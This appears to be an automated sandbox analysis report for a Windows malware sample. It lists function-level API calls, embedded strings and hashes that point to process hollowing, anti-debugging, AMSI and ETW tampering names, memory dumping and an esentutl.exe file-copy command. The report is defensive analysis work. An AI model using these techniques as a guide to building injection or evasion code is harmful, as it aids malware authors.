Function 02E7F7C8 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071COMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,02E8B784,?,?,?,00000000,00000000), ref: 02E7F801

Part of subcall function 02E789D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02EE738C,Function_0000662C,00000004,02EE739C,02EE738C,05F5E103,00000040,02EE73A0,74B10000,00000000,00000000), ref: 02E78AAA

Part of subcall function 02E7F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02E7FAEB,UacInitialize,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,Initialize), ref: 02E7F6EE
Part of subcall function 02E7F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02E7F700

Part of subcall function 02E7F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02E7F754
Part of subcall function 02E7F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02E7F766
Part of subcall function 02E7F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02E7F77D

Part of subcall function 02E67E5C: GetFileAttributesA.KERNEL32(00000000,?,02E8041F,ScanString,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,UacScan,02EE7380,02E8B7B8,UacInitialize), ref: 02E67E67

Part of subcall function 02E6C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02FDB8B8,?,02E80751,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,OpenSession), ref: 02E6C37B

Part of subcall function 02E7DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E7DE40), ref: 02E7DDAB
Part of subcall function 02E7DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02E7DE40), ref: 02E7DDDB
Part of subcall function 02E7DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02E7DDF0
Part of subcall function 02E7DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02E7DE1C
Part of subcall function 02E7DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02E7DE25

Part of subcall function 02E67E80: GetFileAttributesA.KERNEL32(00000000,?,02E8356F,ScanString,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,Initialize), ref: 02E67E8B

Part of subcall function 02E68048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02E8370D,OpenSession,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,Initialize,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8), ref: 02E68055

Strings

Advapi, xrefs: 02E8A9B7, 02E8A9C6, 02E8A9D5, 02E8A9E4, 02E8AA20, 02E8AA2F, 02E8AA3E
sppwmi, xrefs: 02E8ADFC
CreateProcessAsUserW, xrefs: 02E8AA2A, 02E8AA48
BCryptVerifySignature, xrefs: 02E7FEA9, 02E8A2A6
/o, xrefs: 02E864C0
NtOpenFile, xrefs: 02E8B0E2
ieproxy, xrefs: 02E7FB14, 02E7FB3B, 02E7FB6B
CryptSIPGetInfo, xrefs: 02E7FD94
NtAlertResumeThread, xrefs: 02E8A611
DlpGetArchiveFileTraceInfo, xrefs: 02E8A4B3
RetailTracerEnable, xrefs: 02E8A0AF
MZP, xrefs: 02E89992
RtlCreateQueryDebugBuffer, xrefs: 02E8A6DD
NtSetSecurityObject, xrefs: 02E89276
SetUnhandledExceptionFilter, xrefs: 02E8AC0B
EtwEventWrite, xrefs: 02E8B148
TrustOpenStores, xrefs: 02E7FC03
VirtualProtect, xrefs: 02E8AB3F
NtWriteVirtualMemory, xrefs: 02E8B0AF
RtlAllocateHeap, xrefs: 02E8A644, 02E8A6AA
HotKey=, xrefs: 02E86EE1
SLLoadApplicationPolicies, xrefs: 02E89F08
BCryptQueryProviderRegistration, xrefs: 02E7FEDC
UacUninitialize, xrefs: 02E83844, 02E83BB2
NtDeviceIoControlFile, xrefs: 02E8A985
kernel32, xrefs: 02E8AAF0, 02E8AB23, 02E8AB56, 02E8AB89, 02E8ABBC, 02E8ABEF, 02E8AC22
CreateProcessW, xrefs: 02E8AA0C
NtWaitForSingleObject, xrefs: 02E8A677
psapi, xrefs: 02E8A9F3
DllGetActivationFactory, xrefs: 02E8006D
CreateProcessWithLogonW, xrefs: 02E8AA39
tquery, xrefs: 02E8A0C6
WinHttp.WinHttpRequest.5.1, xrefs: 02E8233C
sppc, xrefs: 02E89E86, 02E89EB9, 02E89EEC, 02E89F1F, 02E8AE2F, 02E8AE62
LdrGetProcedureAddress, xrefs: 02E8B07C
GZmMS1j, xrefs: 02E7F80F
EnumProcessModules, xrefs: 02E8A9EE
dbgcore, xrefs: 02E89253, 02E89267
VirtualAllocEx, xrefs: 02E8AB0C
NtQueryDirectoryFile, xrefs: 02E8A994
NtReadVirtualMemory, xrefs: 02E8AFB0
EnumServicesStatusA, xrefs: 02E8A9B2
C:\Windows\System32\, xrefs: 02E8040A, 02E8796B, 02E886B3
ScanString, xrefs: 02E7F962, 02E7FB8D, 02E7FCA2, 02E7FE33, 02E7FFC4, 02E8024D, 02E8038E, 02E80914, 02E8152C, 02E816C8, 02E81B04, 02E81D1F, 02E81D9B, 02E820B8, 02E823DE, 02E826A7, 02E82AE4, 02E82F15, 02E83125, 02E831DB, 02E834DD, 02E835FF, 02E838C0, 02E855B8, 02E85752, 02E85A97, 02E85E5B, 02E864F2, 02E86CD8, 02E86E4F, 02E86F07, 02E87574, 02E87A0E, 02E87E75, 02E88498, 02E88F3F, 02E89331, 02E8971A, 02E89AFB, 02E89DF9, 02E8A1B4, 02E8A59B, 02E8A792, 02E8AD3C
NtOpenObjectAuditAlarm, xrefs: 02E89226
EnumServicesStatusW, xrefs: 02E8A9C1
NtOpenSection, xrefs: 02E8AF17
[InternetShortcut], xrefs: 02E86D48
MiniDumpReadDumpStream, xrefs: 02E89262
NtMapViewOfSection, xrefs: 02E8AF7D
GetProxyDllInfo, xrefs: 02E7FB2A
SLGatherMigrationBlob, xrefs: 02E8AE18
OpenSession, xrefs: 02E7F89A, 02E7FA2A, 02E80312, 02E80433, 02E80540, 02E80658, 02E80A2C, 02E80BCA, 02E80D70, 02E80E90, 02E81025, 02E8111D, 02E8130A, 02E814B0, 02E817DE, 02E81A0C, 02E81B80, 02E81CA3, 02E81E21, 02E821C7, 02E8224A, 02E82362, 02E8247A, 02E82586, 02E827A4, 02E828C1, 02E82B60, 02E82BDC, 02E82DF1, 02E82F91, 02E832D3, 02E83461, 02E8367B, 02E83795, 02E83B36, 02E85634, 02E857CE, 02E8596E, 02E85B13, 02E85C87, 02E85ED7, 02E85F8B, 02E86248, 02E86340, 02E867EF, 02E86AC9, 02E86C3D, 02E86DD3, 02E86F83, 02E8766C, 02E87871, 02E87A8A, 02E87B2D, 02E87CC0, 02E88088, 02E88324, 02E88621, 02E8877A, 02E88920, 02E88AAD, 02E88C41, 02E88DC0, 02E88EC3, 02E89037, 02E892B5, 02E894A5, 02E89796, 02E8991C, 02E89B77, 02E89D7D, 02E89F41, 02E8A230, 02E8A2DF, 02E8A51F, 02E8A716, 02E8A80E, 02E8ACC0, 02E8B288
CryptSIPGetSignedDataMsg, xrefs: 02E7FDFA
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 02E8098A
.url, xrefs: 02E85D93
EtwEventWriteEx, xrefs: 02E8B115
DllRegisterServer, xrefs: 02E7FB54, 02E800A0
DlpNotifyPreDragDrop, xrefs: 02E8A44D
Ntdll, xrefs: 02E8A97B, 02E8A98A, 02E8A999, 02E8A9A8
Initialize, xrefs: 02E7F8FE, 02E8081C, 02E809B0, 02E80B4E, 02E80CF4, 02E80FA9, 02E8164C, 02E81A88, 02E81F32, 02E8203C, 02E82723, 02E82A55, 02E82D75, 02E830A9, 02E83257, 02E83583, 02E8393C, 02E85876, 02E85C0B, 02E86007, 02E861CC, 02E86438, 02E8656E, 02E86773, 02E876E8, 02E883A0, 02E893AD, 02E89FBD, 02E8A35B, 02E8A88A, 02E8AC44, 02E8B190
DlpGetWebSiteAccess, xrefs: 02E8A4E6
SLGetGenuineInformation, xrefs: 02E89E6F
GetProcessMemoryInfo, xrefs: 02E8A148
mssip32, xrefs: 02E7FDAB, 02E7FDDE, 02E7FE11, 02E8A192
bcrypt, xrefs: 02E7FEC0, 02E7FEF3, 02E7FF26, 02E8A2BD
NtCreateSection, xrefs: 02E8AF4A
NtOpenProcess, xrefs: 02E8928A
IconIndex=, xrefs: 02E86DAD
I_QueryTagInformation, xrefs: 02E8923A
FlushInstructionCache, xrefs: 02E8ABD8
NtQueryVirtualMemory, xrefs: 02E8AEB1
advapi32, xrefs: 02E8923F
ScanBuffer, xrefs: 02E7F9C6, 02E7FD1E, 02E7FF48, 02E804AF, 02E805BC, 02E806D4, 02E80AA8, 02E80C46, 02E80DEC, 02E80F0C, 02E810A1, 02E81199, 02E81402, 02E815A8, 02E81744, 02E8185A, 02E818E8, 02E81BFC, 02E81E9D, 02E81FAE, 02E8214B, 02E824F6, 02E82602, 02E82820, 02E8293D, 02E82C58, 02E82CF9, 02E82E6D, 02E8302D, 02E8334F, 02E83719, 02E839B8, 02E83ABA, 02E856B0, 02E859EA, 02E85D03, 02E86083, 02E863BC, 02E86666, 02E8686B, 02E869D1, 02E86B45, 02E86BC1, 02E87764, 02E877F5, 02E87C25, 02E87DB8, 02E87F14, 02E8800C, 02E88529, 02E887F6, 02E8899C, 02E88B29, 02E88CBD, 02E88E3C, 02E890B3, 02E891AB, 02E895C7, 02E898A0, 02E89A39, 02E89C6F, 02E89D01, 02E8A039, 02E8A3D7, 02E8A906, 02E8B20C
Kernel32, xrefs: 02E8AA02, 02E8AA11, 02E8AA4D
spp, xrefs: 02E8A0F9, 02E8A12C, 02E8ADC9
WintrustAddActionID, xrefs: 02E7FC36
BCryptRegisterProvider, xrefs: 02E7FF0F
http, xrefs: 02E82128
NtQuerySystemInformation, xrefs: 02E8A976
MiniDumpWriteDump, xrefs: 02E8924E
NtQueryInformationThread, xrefs: 02E8AEE4
CryptSIPVerifyIndirectData, xrefs: 02E7FDC7, 02E8A17B
LdrLoadDll, xrefs: 02E8B049
endpointdlp, xrefs: 02E8A464, 02E8A497, 02E8A4CA, 02E8A4FD
acS, xrefs: 02E83D02
C:\Users\Public\, xrefs: 02E85D88, 02E86FF3
WriteVirtualMemory, xrefs: 02E8ABA5
smartscreenps, xrefs: 02E80051, 02E80084, 02E800B7
/d , xrefs: 02E864B5
EnumServicesStatusExW, xrefs: 02E8A9DF
GET, xrefs: 02E82455
URL=file:", xrefs: 02E86D57
ntdll, xrefs: 02E8922B, 02E8927B, 02E8928F, 02E8A628, 02E8A65B, 02E8A68E, 02E8A6C1, 02E8A6F4, 02E8AE95, 02E8AEC8, 02E8AEFB, 02E8AF2E, 02E8AF61, 02E8AF94, 02E8AFC7, 02E8AFFA, 02E8B02D, 02E8B060, 02E8B093, 02E8B0C6, 02E8B0F9, 02E8B12C, 02E8B15F
wintrust, xrefs: 02E7FC1A, 02E7FC4D, 02E7FC80
SxTracerGetThreadContextDebug, xrefs: 02E8A0E2, 02E8ADB2
VirtualAlloc, xrefs: 02E8AAD9
UacInitialize, xrefs: 02E7FA8E, 02E80155, 02E80898, 02E8553C, 02E858F2, 02E85DDF, 02E878ED, 02E8912F, 02E8954B
SLGetSLIDList, xrefs: 02E89EA2
C:\\Windows\\System32\\esentutl.exe /y , xrefs: 02E864AA
RtlQueryProcessDebugInformation, xrefs: 02E8A9A3
SLGetEncryptedPIDEx, xrefs: 02E8AE4B
CreateProcessAsUserA, xrefs: 02E8AA1B
NtQuerySecurityObject, xrefs: 02E8AFE3
UacScan, xrefs: 02E7F836, 02E800D9, 02E801D1, 02E807A0, 02E81386, 02E81964, 02E822C6, 02E829D9, 02E83C2E, 02E85B8F, 02E860FF, 02E862C4, 02E865EA, 02E866F7, 02E86955, 02E86A4D, 02E875F0, 02E87992, 02E87BA9, 02E87D3C, 02E87F90, 02E8841C, 02E885A5, 02E886FE, 02E888A4, 02E88A31, 02E88BC5, 02E88D44, 02E88FBB, 02E89429, 02E89643, 02E89824, 02E899BD, 02E89BF3, 02E8AA63
SLIsGenuineLocalEx, xrefs: 02E89ED5
can, xrefs: 02E83D15
OpenProcess, xrefs: 02E8AB72
FindCertsByIssuer, xrefs: 02E7FC69
DlpCheckIsCloudSyncApp, xrefs: 02E8A480
CreateProcessA, xrefs: 02E8A9FD
psapi, xrefs: 02E8A15F
DllGetClassObject, xrefs: 02E7FB03, 02E8003A, 02E8A115, 02E8ADE5
EnumServicesStatusExA, xrefs: 02E8A9D0
NtAccessCheck, xrefs: 02E8B016
NtGetWriteWatch, xrefs: 02E8AE7E
C:\\Users\\Public\\Libraries\\, xrefs: 02E8616F

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
API String ID: 297057983-2644593349
Opcode ID: d961b379e6d1b8c11e2cf1ad665dd746ca036ddccc9399eeb900ee0b788b128e
Instruction ID: decc13ba616212655229c367adfbd0234314c6f469af858e0d05d26fc75650a3
Opcode Fuzzy Hash: d961b379e6d1b8c11e2cf1ad665dd746ca036ddccc9399eeb900ee0b788b128e
Instruction Fuzzy Hash: 7414FA34AC011D8BDB21FB64D884AEE73BAFB85344F50E1A5B04DEB254DA71AE81CF51

Function 02E78D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654
threadnativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02E789D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02EE738C,Function_0000662C,00000004,02EE739C,02EE738C,05F5E103,00000040,02EE73A0,74B10000,00000000,00000000), ref: 02E78AAA

Part of subcall function 02E78788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E78814

GetThreadContext.KERNEL32(00000894,02EE7424,ScanString,02EE73A8,02E7A93C,UacInitialize,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,UacInitialize,02EE73A8), ref: 02E79602

Part of subcall function 02E78400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E78471

Part of subcall function 02E78670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02E786D5

Part of subcall function 02E77A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E77A9F

Part of subcall function 02E77D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E77DEC

SetThreadContext.KERNEL32(00000894,02EE7424,ScanBuffer,02EE73A8,02E7A93C,ScanString,02EE73A8,02E7A93C,Initialize,02EE73A8,02E7A93C,00000890,003B1FF8,02EE74FC,00000004,02EE7500), ref: 02E7A317
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00000000,00000894,02EE7424,ScanBuffer,02EE73A8,02E7A93C,ScanString,02EE73A8,02E7A93C,Initialize,02EE73A8,02E7A93C,00000890,003B1FF8,02EE74FC), ref: 02E7A324

Part of subcall function 02E7894C: LoadLibraryW.KERNEL32(bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize,02EE73A8,02E7A93C,UacScan), ref: 02E78960
Part of subcall function 02E7894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E7897A
Part of subcall function 02E7894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize), ref: 02E789B6

Strings

NtSetSecurityObject, xrefs: 02E7A88F
bcrypt, xrefs: 02E7A578, 02E7A58C, 02E7A5A0
sppc, xrefs: 02E79376
OpenSession, xrefs: 02E78DA9, 02E791CC, 02E7927E, 02E7A64F, 02E7A795
NtOpenObjectAuditAlarm, xrefs: 02E7A634, 02E7A6EC
ntdll, xrefs: 02E7A625, 02E7A639, 02E7A6F1, 02E7A894, 02E7A8A8
UacScan, xrefs: 02E78E73, 02E7908B, 02E79687, 02E79A83, 02E79BF7, 02E7A3A1, 02E7A839
dbgcore, xrefs: 02E7A719, 02E7A72D
NtOpenProcess, xrefs: 02E7A8A3
BCryptVerifySignature, xrefs: 02E7A573
SLGetLicenseInformation, xrefs: 02E7935F
UacInitialize, xrefs: 02E79032, 02E79393, 02E79512, 02E79616, 02E79A12, 02E79B86, 02E7A330
I_QueryTagInformation, xrefs: 02E7A700
NtReadVirtualMemory, xrefs: 02E7A620
ScanString, xrefs: 02E78E02, 02E78FAD, 02E7915B, 02E79583, 02E79769, 02E798F0, 02E79D7D, 02E79F3B, 02E7A0AB, 02E7A21E, 02E7A509, 02E7A5B6
MiniDumpReadDumpStream, xrefs: 02E7A728
advapi32, xrefs: 02E7A705
MiniDumpWriteDump, xrefs: 02E7A714
BCryptRegisterProvider, xrefs: 02E7A59B
BCryptQueryProviderRegistration, xrefs: 02E7A587
Initialize, xrefs: 02E790EA, 02E796F8, 02E7987F, 02E79C68, 02E79ECA, 02E7A03A, 02E7A1AD, 02E7A412, 02E7A743
ScanBuffer, xrefs: 02E78ECC, 02E78F54, 02E792EF, 02E79404, 02E794A1, 02E797DA, 02E79961, 02E79AF4, 02E79CD9, 02E79DEE, 02E79FAC, 02E7A11C, 02E7A28F, 02E7A483, 02E7A6A1, 02E7A7E7

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 2388221946-51457883
Opcode ID: 124946a43b0f45545d6e411d8594f281e0a1c1ca9846f66550b51a2ba557911b
Instruction ID: e268735d4c6918b6262cd91aa12bfd473f98cc6c0593399e57fd5bf8d94f78fe
Opcode Fuzzy Hash: 124946a43b0f45545d6e411d8594f281e0a1c1ca9846f66550b51a2ba557911b
Instruction Fuzzy Hash: 33E21234AC01189BDB21FB64EC89BDE73B6AF95340F50E1B1B009AB354DA70AE95CF51

Function 02E78D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02E789D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02EE738C,Function_0000662C,00000004,02EE739C,02EE738C,05F5E103,00000040,02EE73A0,74B10000,00000000,00000000), ref: 02E78AAA

Part of subcall function 02E78788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E78814

GetThreadContext.KERNEL32(00000894,02EE7424,ScanString,02EE73A8,02E7A93C,UacInitialize,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,UacInitialize,02EE73A8), ref: 02E79602

Part of subcall function 02E78400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E78471

Part of subcall function 02E78670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02E786D5

Part of subcall function 02E77A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E77A9F

Strings

NtSetSecurityObject, xrefs: 02E7A88F
bcrypt, xrefs: 02E7A578, 02E7A58C, 02E7A5A0
sppc, xrefs: 02E79376
OpenSession, xrefs: 02E78DA9, 02E791CC, 02E7927E, 02E7A64F, 02E7A795
NtOpenObjectAuditAlarm, xrefs: 02E7A634, 02E7A6EC
ntdll, xrefs: 02E7A625, 02E7A639, 02E7A6F1, 02E7A894, 02E7A8A8
UacScan, xrefs: 02E78E73, 02E7908B, 02E79687, 02E79A83, 02E79BF7, 02E7A3A1, 02E7A839
dbgcore, xrefs: 02E7A719, 02E7A72D
NtOpenProcess, xrefs: 02E7A8A3
BCryptVerifySignature, xrefs: 02E7A573
SLGetLicenseInformation, xrefs: 02E7935F
UacInitialize, xrefs: 02E79032, 02E79393, 02E79512, 02E79616, 02E7A330
I_QueryTagInformation, xrefs: 02E7A700
NtReadVirtualMemory, xrefs: 02E7A620
ScanString, xrefs: 02E78E02, 02E78FAD, 02E7915B, 02E79583, 02E79769, 02E798F0, 02E79D7D, 02E79F3B, 02E7A0AB, 02E7A21E, 02E7A509, 02E7A5B6
MiniDumpReadDumpStream, xrefs: 02E7A728
advapi32, xrefs: 02E7A705
MiniDumpWriteDump, xrefs: 02E7A714
BCryptRegisterProvider, xrefs: 02E7A59B
BCryptQueryProviderRegistration, xrefs: 02E7A587
Initialize, xrefs: 02E790EA, 02E796F8, 02E7987F, 02E79C68, 02E79ECA, 02E7A03A, 02E7A1AD, 02E7A412, 02E7A743
ScanBuffer, xrefs: 02E78ECC, 02E78F54, 02E792EF, 02E79404, 02E794A1, 02E797DA, 02E79961, 02E79AF4, 02E79CD9, 02E79DEE, 02E79FAC, 02E7A11C, 02E7A28F, 02E7A483, 02E7A6A1, 02E7A7E7

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 3386062106-51457883
Opcode ID: de31e5f11def10e8cc1418ce95167219e531431cf8b469e366b78976958e2496
Instruction ID: e9a352b62a0e665617f73402bae841510302b14ce6841249527b3342463d566e
Opcode Fuzzy Hash: de31e5f11def10e8cc1418ce95167219e531431cf8b469e366b78976958e2496
Instruction Fuzzy Hash: C7E21234AC01189BDB21FB64EC89BDE73B6AF95340F50E1B1B009AB354DA70AE95CF51

Function 02E65ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E60000,02E8E790), ref: 02E65AE8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E60000,02E8E790), ref: 02E65B06
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E60000,02E8E790), ref: 02E65B24
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02E65B42
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02E65BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02E65B8B
RegQueryValueExA.ADVAPI32(?,02E65D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02E65BD1,?,80000001), ref: 02E65BA9
RegCloseKey.ADVAPI32(?,02E65BD8,00000000,?,?,00000000,02E65BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E65BCB
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02E65BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02E65BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02E65BFB
